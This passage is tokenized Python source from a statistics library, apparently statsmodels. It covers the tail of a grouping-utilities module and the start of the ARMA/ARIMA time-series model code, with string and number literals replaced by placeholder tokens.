= None <EOL> @ property <EOL> def index_shape ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . levshape <EOL> else : <EOL> return self . index . shape <EOL> @ property <EOL> def levels ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . levels <EOL> else : <EOL> return pd . Categorical ( self . index ) . levels <EOL> @ property <EOL> def labels ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . labels <EOL> else : <EOL> tmp = pd . Categorical ( self . index ) <EOL> try : <EOL> labl = tmp . codes <EOL> except AttributeError : <EOL> labl = tmp . labels <EOL> return labl [ None ] <EOL> @ property <EOL> def group_names ( self ) : <EOL> return self . index . names <EOL> def reindex ( self , index = None , names = None ) : <EOL> """<STR_LIT>""" <EOL> if names is None : <EOL> names = self . group_names <EOL> self = Grouping ( index , names ) <EOL> def get_slices ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> groups = self . index . 
get_level_values ( level ) . unique ( ) <EOL> groups . sort ( ) <EOL> if isinstance ( self . index , MultiIndex ) : <EOL> self . slices = [ self . index . get_loc_level ( x , level = level ) [ <NUM_LIT:0> ] <EOL> for x in groups ] <EOL> else : <EOL> self . slices = [ self . index . get_loc ( x ) for x in groups ] <EOL> def count_categories ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . counts = np . bincount ( self . labels [ level ] ) <EOL> def check_index ( self , is_sorted = True , unique = True , index = None ) : <EOL> """<STR_LIT>""" <EOL> if not index : <EOL> index = self . index <EOL> if is_sorted : <EOL> test = pd . DataFrame ( lrange ( len ( index ) ) , index = index ) <EOL> test_sorted = test . sort ( ) <EOL> if not test . index . equals ( test_sorted . index ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> if unique : <EOL> if len ( index ) != len ( index . unique ( ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> def sort ( self , data , index = None ) : <EOL> """<STR_LIT>""" <EOL> if index is None : <EOL> index = self . index <EOL> if data_util . _is_using_ndarray_type ( data , None ) : <EOL> if data . ndim == <NUM_LIT:1> : <EOL> out = pd . Series ( data , index = index , copy = True ) <EOL> out = out . sort_index ( ) <EOL> else : <EOL> out = pd . DataFrame ( data , index = index ) <EOL> out = out . sort ( inplace = False ) <EOL> return np . array ( out ) , out . index <EOL> elif data_util . _is_using_pandas ( data , None ) : <EOL> out = data <EOL> out = out . reindex ( index ) <EOL> out = out . sort_index ( ) <EOL> return out , out . index <EOL> else : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg ) <EOL> def transform_dataframe ( self , dataframe , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if dataframe . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> out = dataframe . groupby ( level = level ) . apply ( function , ** kwargs ) <EOL> if <NUM_LIT:1> in out . 
shape : <EOL> return np . ravel ( out ) <EOL> else : <EOL> return np . array ( out ) <EOL> def transform_array ( self , array , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if array . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> dataframe = pd . DataFrame ( array , index = self . index ) <EOL> return self . transform_dataframe ( dataframe , function , level = level , <EOL> ** kwargs ) <EOL> def transform_slices ( self , array , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> array = np . asarray ( array ) <EOL> if array . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . get_slices ( level = level ) <EOL> processed = [ ] <EOL> for s in self . slices : <EOL> if array . ndim == <NUM_LIT:2> : <EOL> subset = array [ s , : ] <EOL> elif array . ndim == <NUM_LIT:1> : <EOL> subset = array [ s ] <EOL> processed . append ( function ( subset , s , ** kwargs ) ) <EOL> processed = np . array ( processed ) <EOL> return processed . reshape ( - <NUM_LIT:1> , processed . shape [ - <NUM_LIT:1> ] ) <EOL> def dummies_time ( self ) : <EOL> self . dummy_sparse ( level = <NUM_LIT:1> ) <EOL> return self . _dummies <EOL> def dummies_groups ( self , level = <NUM_LIT:0> ) : <EOL> self . dummy_sparse ( level = level ) <EOL> return self . _dummies <EOL> def dummy_sparse ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> groups = self . labels [ level ] <EOL> indptr = np . arange ( len ( groups ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( groups ) , dtype = np . int8 ) <EOL> self . _dummies = sparse . csr_matrix ( ( data , groups , indptr ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from numpy . testing import assert_equal <EOL> np . random . seed ( <NUM_LIT> ) <EOL> groups = np . random . 
randint ( <NUM_LIT:0> , <NUM_LIT:2> , size = ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> uv , ux , u , label = combine_indices ( groups , return_labels = True ) <EOL> uv , ux , u , label = combine_indices ( groups , prefix = '<STR_LIT>' , sep = '<STR_LIT:U+002C>' , <EOL> return_labels = True ) <EOL> group0 = np . array ( [ '<STR_LIT>' , '<STR_LIT>' ] ) [ groups [ : , <NUM_LIT:0> ] ] <EOL> group1 = np . array ( [ '<STR_LIT>' , '<STR_LIT>' ] ) [ groups [ : , <NUM_LIT:1> ] ] <EOL> uv , ux , u , label = combine_indices ( ( group0 , group1 ) , <EOL> prefix = '<STR_LIT>' , <EOL> sep = '<STR_LIT:U+002C>' , <EOL> return_labels = True ) <EOL> uv , ux , u , label = combine_indices ( ( group0 , group1 ) , prefix = '<STR_LIT>' , sep = '<STR_LIT:.>' , <EOL> return_labels = True ) <EOL> group_joint = np . array ( label ) [ uv ] <EOL> group_joint_expected = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> dtype = '<STR_LIT>' ) <EOL> assert_equal ( group_joint , group_joint_expected ) <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> g = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> u = lrange ( <NUM_LIT:3> ) <EOL> indptr = np . arange ( len ( g ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( g ) , dtype = np . int8 ) <EOL> a = sparse . csr_matrix ( ( data , g , indptr ) ) <EOL> print ( a . todense ( ) ) <EOL> print ( np . all ( a . todense ( ) == ( g [ : , None ] == np . arange ( <NUM_LIT:3> ) ) . astype ( int ) ) ) <EOL> x = np . arange ( len ( g ) * <NUM_LIT:3> ) . reshape ( len ( g ) , <NUM_LIT:3> , order = '<STR_LIT:F>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( x . T * a ) <EOL> print ( np . dot ( x . T , g [ : , None ] == np . arange ( <NUM_LIT:3> ) ) ) <EOL> print ( np . array ( [ np . 
bincount ( g , weights = x [ : , col ] ) for col in range ( <NUM_LIT:3> ) ] ) ) <EOL> for cat in u : <EOL> print ( x [ g == cat ] . sum ( <NUM_LIT:0> ) ) <EOL> for cat in u : <EOL> x [ g == cat ] . sum ( <NUM_LIT:0> ) <EOL> cc = sparse . csr_matrix ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> print ( group_sums ( np . arange ( len ( g ) * <NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) , g , <EOL> use_bincount = False ) . T ) <EOL> print ( group_sums ( np . arange ( len ( g ) * <NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) [ : , : , <NUM_LIT:0> ] , g ) ) <EOL> print ( group_sums ( np . arange ( len ( g ) * <NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) [ : , : , <NUM_LIT:1> ] , g ) ) <EOL> x = np . 
arange ( len ( g ) * <NUM_LIT:3> ) . reshape ( len ( g ) , <NUM_LIT:3> , order = '<STR_LIT:F>' ) <EOL> mygroup = Group ( g ) <EOL> print ( mygroup . group_int ) <EOL> print ( mygroup . group_sums ( x ) ) <EOL> print ( mygroup . labels ( ) ) </s>
<s> from __future__ import absolute_import <EOL> from statsmodels . compat . python import string_types , range <EOL> from datetime import datetime <EOL> import numpy as np <EOL> from scipy import optimize <EOL> from scipy . stats import t , norm <EOL> from scipy . signal import lfilter <EOL> from numpy import dot , log , zeros , pi <EOL> from numpy . linalg import inv <EOL> from statsmodels . tools . decorators import ( cache_readonly , <EOL> resettable_cache ) <EOL> import statsmodels . tsa . base . tsa_model as tsbase <EOL> import statsmodels . base . wrapper as wrap <EOL> from statsmodels . regression . linear_model import yule_walker , GLS <EOL> from statsmodels . tsa . tsatools import ( lagmat , add_trend , <EOL> _ar_transparams , _ar_invtransparams , <EOL> _ma_transparams , _ma_invtransparams , <EOL> unintegrate , unintegrate_levels ) <EOL> from statsmodels . tsa . vector_ar import util <EOL> from statsmodels . tsa . ar_model import AR <EOL> from statsmodels . tsa . arima_process import arma2ma <EOL> from statsmodels . tools . numdiff import approx_hess_cs , approx_fprime_cs <EOL> from statsmodels . tsa . base . datetools import _index_date <EOL> from statsmodels . tsa . 
kalmanf import KalmanFilter <EOL> _armax_notes = """<STR_LIT>""" <EOL> _arma_params = """<STR_LIT>""" <EOL> _arma_model = "<STR_LIT>" <EOL> _arima_model = "<STR_LIT>" <EOL> _arima_params = """<STR_LIT>""" <EOL> _predict_notes = """<STR_LIT>""" <EOL> _results_notes = """<STR_LIT>""" <EOL> _predict = """<STR_LIT>""" <EOL> _predict_returns = """<STR_LIT>""" <EOL> _arma_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _predict_notes } <EOL> _arma_results_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _results_notes } <EOL> _arima_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _predict_notes } <EOL> _arima_results_predict = _predict % { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <EOL> """<STR_LIT>""" , <EOL> "<STR_LIT>" : _predict_returns , <EOL> "<STR_LIT>" : _results_notes } <EOL> _arima_plot_predict_example = """<STR_LIT>""" <EOL> _plot_predict = ( """<STR_LIT>""" + '<STR_LIT:\n>' . join ( _predict . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:2> : ] ) ) % { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : ( '<STR_LIT:\n>' + _arima_plot_predict_example + <EOL> '<STR_LIT:\n>' + _results_notes ) <EOL> } <EOL> _arima_plot_predict = ( """<STR_LIT>""" + '<STR_LIT:\n>' . join ( _predict . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:2> : ] ) ) % { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : """<STR_LIT>""" , <EOL> "<STR_LIT>" : ( '<STR_LIT:\n>' + _arima_plot_predict_example + <EOL> '<STR_LIT:\n>' + <EOL> '<STR_LIT:\n>' . 
join ( _results_notes . split ( '<STR_LIT:\n>' ) [ : <NUM_LIT:3> ] ) + <EOL> ( """<STR_LIT>""" ) + <EOL> '<STR_LIT:\n>' . join ( _results_notes . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:3> : ] ) ) <EOL> } <EOL> def cumsum_n ( x , n ) : <EOL> if n : <EOL> n -= <NUM_LIT:1> <EOL> x = np . cumsum ( x ) <EOL> return cumsum_n ( x , n ) <EOL> else : <EOL> return x <EOL> def _check_arima_start ( start , k_ar , k_diff , method , dynamic ) : <EOL> if start < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> elif ( dynamic or '<STR_LIT>' not in method ) and start < k_ar : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> def _get_predict_out_of_sample ( endog , p , q , k_trend , k_exog , start , errors , <EOL> trendparam , exparams , arparams , maparams , steps , <EOL> method , exog = None ) : <EOL> """<STR_LIT>""" <EOL> if q : <EOL> resid = np . zeros ( q ) <EOL> if start and '<STR_LIT>' in method or ( start == p and not start == <NUM_LIT:0> ) : <EOL> resid [ : q ] = errors [ start - q : start ] <EOL> elif start : <EOL> resid [ : q ] = errors [ start - q - p : start - p ] <EOL> else : <EOL> resid [ : q ] = errors [ - q : ] <EOL> else : <EOL> resid = None <EOL> y = endog <EOL> if k_trend == <NUM_LIT:1> : <EOL> if k_exog > <NUM_LIT:0> : <EOL> if np . ndim ( exog ) == <NUM_LIT:1> and k_exog == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> elif np . ndim ( exog ) == <NUM_LIT:1> : <EOL> if len ( exog ) != k_exog : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> exog = exog [ None , : ] <EOL> X = lagmat ( np . dot ( exog , exparams ) , p , original = '<STR_LIT>' , trim = '<STR_LIT>' ) <EOL> mu = trendparam * ( <NUM_LIT:1> - arparams . sum ( ) ) <EOL> mu = mu + ( np . r_ [ <NUM_LIT:1> , - arparams [ : : - <NUM_LIT:1> ] ] * X ) . sum ( <NUM_LIT:1> ) [ : , None ] <EOL> else : <EOL> mu = trendparam * ( <NUM_LIT:1> - arparams . sum ( ) ) <EOL> mu = np . array ( [ mu ] * steps ) <EOL> elif k_exog > <NUM_LIT:0> : <EOL> X = np . 
dot ( exog , exparams ) <EOL> X = lagmat ( X , p , original = '<STR_LIT>' , trim = '<STR_LIT>' ) <EOL> mu = ( np . r_ [ <NUM_LIT:1> , - arparams [ : : - <NUM_LIT:1> ] ] * X ) . sum ( <NUM_LIT:1> ) [ : , None ] <EOL> else : <EOL> mu = np . zeros ( steps ) <EOL> endog = np . zeros ( p + steps - <NUM_LIT:1> ) <EOL> if p and start : <EOL> endog [ : p ] = y [ start - p : start ] <EOL> elif p : <EOL> endog [ : p ] = y [ - p : ] <EOL> return endog , resid , mu <EOL> def _arma_predict_out_of_sample ( params , steps , errors , p , q , k_trend , k_exog , <EOL> endog , exog = None , start = <NUM_LIT:0> , method = '<STR_LIT>' ) : <EOL> ( trendparam , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( p , q ) , k_trend , <EOL> k_exog , reverse = True ) <EOL> endog , resid , mu = _get_predict_out_of_sample ( endog , p , q , k_trend , k_exog , <EOL> start , errors , trendparam , <EOL> exparams , arparams , <EOL> maparams , steps , method , <EOL> exog ) <EOL> forecast = np . zeros ( steps ) <EOL> if steps == <NUM_LIT:1> : <EOL> if q : <EOL> return mu [ <NUM_LIT:0> ] + np . dot ( arparams , endog [ : p ] ) + np . dot ( maparams , <EOL> resid [ : q ] ) <EOL> else : <EOL> return mu [ <NUM_LIT:0> ] + np . dot ( arparams , endog [ : p ] ) <EOL> if q : <EOL> i = <NUM_LIT:0> <EOL> else : <EOL> i = - <NUM_LIT:1> <EOL> for i in range ( min ( q , steps - <NUM_LIT:1> ) ) : <EOL> fcast = ( mu [ i ] + np . dot ( arparams , endog [ i : i + p ] ) + <EOL> np . dot ( maparams [ : q - i ] , resid [ i : i + q ] ) ) <EOL> forecast [ i ] = fcast <EOL> endog [ i + p ] = fcast <EOL> for i in range ( i + <NUM_LIT:1> , steps - <NUM_LIT:1> ) : <EOL> fcast = mu [ i ] + np . dot ( arparams , endog [ i : i + p ] ) <EOL> forecast [ i ] = fcast <EOL> endog [ i + p ] = fcast <EOL> forecast [ steps - <NUM_LIT:1> ] = mu [ steps - <NUM_LIT:1> ] + np . 
dot ( arparams , endog [ steps - <NUM_LIT:1> : ] ) <EOL> return forecast <EOL> def _arma_predict_in_sample ( start , end , endog , resid , k_ar , method ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in method : <EOL> fittedvalues = endog - resid <EOL> else : <EOL> fittedvalues = endog [ k_ar : ] - resid <EOL> fv_start = start <EOL> if '<STR_LIT>' not in method : <EOL> fv_start -= k_ar <EOL> fv_end = min ( len ( fittedvalues ) , end + <NUM_LIT:1> ) <EOL> return fittedvalues [ fv_start : fv_end ] <EOL> def _validate ( start , k_ar , k_diff , dates , method ) : <EOL> if isinstance ( start , ( string_types , datetime ) ) : <EOL> start = _index_date ( start , dates ) <EOL> start -= k_diff <EOL> if '<STR_LIT>' not in method and start < k_ar - k_diff : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % start ) <EOL> return start <EOL> def _unpack_params ( params , order , k_trend , k_exog , reverse = False ) : <EOL> p , q = order <EOL> k = k_trend + k_exog <EOL> maparams = params [ k + p : ] <EOL> arparams = params [ k : k + p ] <EOL> trend = params [ : k_trend ] <EOL> exparams = params [ k_trend : k ] <EOL> if reverse : <EOL> return trend , exparams , arparams [ : : - <NUM_LIT:1> ] , maparams [ : : - <NUM_LIT:1> ] <EOL> return trend , exparams , arparams , maparams <EOL> def _unpack_order ( order ) : <EOL> k_ar , k_ma , k = order <EOL> k_lags = max ( k_ar , k_ma + <NUM_LIT:1> ) <EOL> return k_ar , k_ma , order , k_lags <EOL> def _make_arma_names ( data , k_trend , order , exog_names ) : <EOL> k_ar , k_ma = order <EOL> exog_names = exog_names or [ ] <EOL> ar_lag_names = util . make_lag_names ( [ data . ynames ] , k_ar , <NUM_LIT:0> ) <EOL> ar_lag_names = [ '<STR_LIT>' . join ( ( '<STR_LIT>' , i ) ) for i in ar_lag_names ] <EOL> ma_lag_names = util . make_lag_names ( [ data . ynames ] , k_ma , <NUM_LIT:0> ) <EOL> ma_lag_names = [ '<STR_LIT>' . join ( ( '<STR_LIT>' , i ) ) for i in ma_lag_names ] <EOL> trend_name = util . 
make_lag_names ( '<STR_LIT>' , <NUM_LIT:0> , k_trend ) <EOL> if exog_names [ - k_ma : ] == ma_lag_names and exog_names [ - ( k_ar + k_ma ) : - k_ma ] == ar_lag_names and ( not exog_names or not trend_name or trend_name [ <NUM_LIT:0> ] == exog_names [ <NUM_LIT:0> ] ) : <EOL> return exog_names <EOL> exog_names = trend_name + exog_names + ar_lag_names + ma_lag_names <EOL> return exog_names <EOL> def _make_arma_exog ( endog , exog , trend ) : <EOL> k_trend = <NUM_LIT:1> <EOL> if exog is None and trend == '<STR_LIT:c>' : <EOL> exog = np . ones ( ( len ( endog ) , <NUM_LIT:1> ) ) <EOL> elif exog is not None and trend == '<STR_LIT:c>' : <EOL> exog = add_trend ( exog , trend = '<STR_LIT:c>' , prepend = True ) <EOL> elif exog is not None and trend == '<STR_LIT>' : <EOL> if exog . var ( ) == <NUM_LIT:0> : <EOL> exog = None <EOL> k_trend = <NUM_LIT:0> <EOL> if trend == '<STR_LIT>' : <EOL> k_trend = <NUM_LIT:0> <EOL> return k_trend , exog <EOL> def _check_estimable ( nobs , n_params ) : <EOL> if nobs <= n_params : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> class ARMA ( tsbase . TimeSeriesModel ) : <EOL> __doc__ = tsbase . _tsa_doc % { "<STR_LIT>" : _arma_model , <EOL> "<STR_LIT>" : _arma_params , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : _armax_notes % <EOL> { "<STR_LIT>" : "<STR_LIT>" } } <EOL> def __init__ ( self , endog , order , exog = None , dates = None , freq = None , <EOL> missing = '<STR_LIT:none>' ) : <EOL> super ( ARMA , self ) . __init__ ( endog , exog , dates , freq , missing = missing ) <EOL> exog = self . data . exog <EOL> _check_estimable ( len ( self . endog ) , sum ( order ) ) <EOL> self . k_ar = k_ar = order [ <NUM_LIT:0> ] <EOL> self . k_ma = k_ma = order [ <NUM_LIT:1> ] <EOL> self . k_lags = max ( k_ar , k_ma + <NUM_LIT:1> ) <EOL> if exog is not None : <EOL> if exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> k_exog = exog . shape [ <NUM_LIT:1> ] <EOL> else : <EOL> k_exog = <NUM_LIT:0> <EOL> self . 
k_exog = k_exog <EOL> def _fit_start_params_hr ( self , order ) : <EOL> """<STR_LIT>""" <EOL> p , q , k = order <EOL> start_params = zeros ( ( p + q + k ) ) <EOL> endog = self . endog . copy ( ) <EOL> exog = self . exog <EOL> if k != <NUM_LIT:0> : <EOL> ols_params = GLS ( endog , exog ) . fit ( ) . params <EOL> start_params [ : k ] = ols_params <EOL> endog -= np . dot ( exog , ols_params ) . squeeze ( ) <EOL> if q != <NUM_LIT:0> : <EOL> if p != <NUM_LIT:0> : <EOL> nobs = len ( endog ) <EOL> maxlag = int ( round ( <NUM_LIT:12> * ( nobs / <NUM_LIT> ) ** ( <NUM_LIT:1> / <NUM_LIT> ) ) ) <EOL> if maxlag >= nobs : <EOL> maxlag = nobs - <NUM_LIT:1> <EOL> armod = AR ( endog ) . fit ( ic = '<STR_LIT>' , trend = '<STR_LIT>' , maxlag = maxlag ) <EOL> arcoefs_tmp = armod . params <EOL> p_tmp = armod . k_ar <EOL> if p_tmp + q >= len ( endog ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> resid = endog [ p_tmp : ] - np . dot ( lagmat ( endog , p_tmp , <EOL> trim = '<STR_LIT>' ) , <EOL> arcoefs_tmp ) <EOL> if p < p_tmp + q : <EOL> endog_start = p_tmp + q - p <EOL> resid_start = <NUM_LIT:0> <EOL> else : <EOL> endog_start = <NUM_LIT:0> <EOL> resid_start = p - p_tmp - q <EOL> lag_endog = lagmat ( endog , p , '<STR_LIT>' ) [ endog_start : ] <EOL> lag_resid = lagmat ( resid , q , '<STR_LIT>' ) [ resid_start : ] <EOL> X = np . column_stack ( ( lag_endog , lag_resid ) ) <EOL> coefs = GLS ( endog [ max ( p_tmp + q , p ) : ] , X ) . fit ( ) . params <EOL> start_params [ k : k + p + q ] = coefs <EOL> else : <EOL> start_params [ k + p : k + p + q ] = yule_walker ( endog , order = q ) [ <NUM_LIT:0> ] <EOL> if q == <NUM_LIT:0> and p != <NUM_LIT:0> : <EOL> arcoefs = yule_walker ( endog , order = p ) [ <NUM_LIT:0> ] <EOL> start_params [ k : k + p ] = arcoefs <EOL> if p and not np . all ( np . abs ( np . roots ( np . 
r_ [ <NUM_LIT:1> , - start_params [ k : k + p ] ] <EOL> ) ) < <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif q and not np . all ( np . abs ( np . roots ( np . r_ [ <NUM_LIT:1> , start_params [ k + p : ] ] <EOL> ) ) < <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return start_params <EOL> def _fit_start_params ( self , order , method ) : <EOL> if method != '<STR_LIT>' : <EOL> start_params = self . _fit_start_params_hr ( order ) <EOL> else : <EOL> func = lambda params : - self . loglike_css ( params ) <EOL> start_params = self . _fit_start_params_hr ( order ) <EOL> if self . transparams : <EOL> start_params = self . _invtransparams ( start_params ) <EOL> bounds = [ ( None , ) * <NUM_LIT:2> ] * sum ( order ) <EOL> mlefit = optimize . fmin_l_bfgs_b ( func , start_params , <EOL> approx_grad = True , m = <NUM_LIT:12> , <EOL> pgtol = <NUM_LIT> , factr = <NUM_LIT> , <EOL> bounds = bounds , iprint = - <NUM_LIT:1> ) <EOL> start_params = self . _transparams ( mlefit [ <NUM_LIT:0> ] ) <EOL> return start_params <EOL> def score ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return approx_fprime_cs ( params , self . loglike , args = ( False , ) ) <EOL> def hessian ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return approx_hess_cs ( params , self . loglike , args = ( False , ) ) <EOL> def _transparams ( self , params ) : <EOL> """<STR_LIT>""" <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> newparams = np . zeros_like ( params ) <EOL> if k != <NUM_LIT:0> : <EOL> newparams [ : k ] = params [ : k ] <EOL> if k_ar != <NUM_LIT:0> : <EOL> newparams [ k : k + k_ar ] = _ar_transparams ( params [ k : k + k_ar ] . copy ( ) ) <EOL> if k_ma != <NUM_LIT:0> : <EOL> newparams [ k + k_ar : ] = _ma_transparams ( params [ k + k_ar : ] . 
copy ( ) ) <EOL> return newparams <EOL> def _invtransparams ( self , start_params ) : <EOL> """<STR_LIT>""" <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> newparams = start_params . copy ( ) <EOL> arcoefs = newparams [ k : k + k_ar ] <EOL> macoefs = newparams [ k + k_ar : ] <EOL> if k_ar != <NUM_LIT:0> : <EOL> newparams [ k : k + k_ar ] = _ar_invtransparams ( arcoefs ) <EOL> if k_ma != <NUM_LIT:0> : <EOL> newparams [ k + k_ar : k + k_ar + k_ma ] = _ma_invtransparams ( macoefs ) <EOL> return newparams <EOL> def _get_predict_start ( self , start , dynamic ) : <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> k_ar = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if start is None : <EOL> if '<STR_LIT>' in method and not dynamic : <EOL> start = <NUM_LIT:0> <EOL> else : <EOL> start = k_ar <EOL> self . _set_predict_start_date ( start ) <EOL> elif isinstance ( start , int ) : <EOL> start = super ( ARMA , self ) . _get_predict_start ( start ) <EOL> else : <EOL> start = _validate ( start , k_ar , k_diff , self . data . dates , <EOL> method ) <EOL> start = super ( ARMA , self ) . _get_predict_start ( start ) <EOL> _check_arima_start ( start , k_ar , k_diff , method , dynamic ) <EOL> return start <EOL> def _get_predict_end ( self , end , dynamic = False ) : <EOL> return super ( ARMA , self ) . _get_predict_end ( end ) <EOL> def geterrors ( self , params ) : <EOL> """<STR_LIT>""" <EOL> params = np . asarray ( params ) <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> k = self . k_exog + self . k_trend <EOL> method = getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in method : <EOL> ( y , k , nobs , k_ar , k_ma , k_lags , newparams , Z_mat , m , R_mat , <EOL> T_mat , paramsdtype ) = KalmanFilter . _init_kalman_state ( params , <EOL> self ) <EOL> errors = KalmanFilter . 
